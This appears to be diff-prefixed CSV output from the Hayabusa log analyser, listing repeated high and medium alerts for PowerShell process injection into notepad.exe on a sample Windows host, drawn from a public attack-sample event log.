+2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.333 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.348 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.364 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.380 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.395 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.411 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.426 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.458 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.473 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.489 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.505 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.520 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.536 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.551 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.583 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.598 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.614 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.630 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.661 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.692 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.708 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.723 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
